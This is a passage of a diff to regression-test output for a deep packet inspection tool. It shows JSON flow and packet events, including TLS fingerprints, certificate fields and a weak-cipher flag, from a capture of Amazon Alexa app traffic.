{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 
Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="} 
@@ -248,120 +248,120 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"} 
-01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like 
Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"} 